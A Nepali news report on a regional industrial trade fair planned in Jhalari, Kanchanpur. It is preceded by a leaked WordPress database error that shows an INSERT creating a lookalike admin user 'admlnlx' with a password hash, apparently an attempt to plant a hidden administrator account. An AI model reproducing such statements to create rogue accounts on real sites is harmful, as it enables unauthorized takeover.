WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/dZUouM9iW17CPjUNZYVg6dN01tMR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 23:52:58', '', 'admlnlx', 'admlnlx')
कञ्चनपुर, माघ २७ –
कृषि, पर्या–पर्यटन र संस्कृतिको प्रचारप्रसार तथा प्रवद्र्धनका लागि झलारीमा शुक्लाफाँटा क्षेत्रीय औद्योगिक व्यापार मेला हुने भएको छ ।
‘कृषि, पर्यटन संस्कृति हाम्रो शान, व्यापार प्रवद्र्धन आर्थिक समृद्धिको अभियान’ नाराका साथ झलारी पिपलाडी उद्योग वाणिज्य सङ्घको आयोजनामा अगामी फागुन ११ गतेदेखि २१ गतेसम्म सो व्यापार मेला आयोजना हुने भएको हो ।
मेलामा सुदूरपश्चिम क्षेत्रका पर्यटकीय क्षेत्रको प्रचारप्रसार गर्ने सामग्री, सांस्कृतिक पहिरन, गहना, नृत्य, गीतका साथै हस्तकलाका सामान, कृषिसँग सम्बन्धित औजार, उपकरण, उत्पादन, व्यापारिक वस्तु र मौलिक परिकार राखिने छन् । यस्तै बेदकोट, मुडका, सुनदेवी, घटाल थान, शुक्लाफाँटा, झिलमिला, लालझाडी मोहनालगायत पर्यटकीय क्षेत्रको प्रचारप्रसार र पर्यटकलाई आकर्षित गर्न मेला आयोजना गर्न लागिएको झलारी पिपलाडी उद्योग वाणिज्य सङ्घका अध्यक्ष हरेन्द्र भण्डारीले जानकारी दिनुभयो । मेलाका माध्यमबाट लगानीका अवसर सिर्जना गर्ने, निकासी योग्य वस्तुको पहिचान र प्रवद्र्धनमा सहयोग पु¥याउने, स्थानीय देउडा, हुडकेली, धुमारी, ढुस्को, राना थारु होली, चौधरी डगौरा थारुको मौलिक नाच, फाग, गौरा, कला संस्कृतिको जगेर्ना गर्न मेलाले सघाउ पु¥याउने छ ।
मेलामा सुदूरपश्चिम क्षेत्रका मौलिक परिकार गतानी, डुब्का, माणा, बाबर, सेलरोटी, राना समुदायका परिकारको स्वाद लिन पाइनेछ । मेलमा २५० कक्ष राखिने छन् भने रु ३९ लाख ८१ हजार लागत अनुमान आयोजले गरेको छ ।- रासस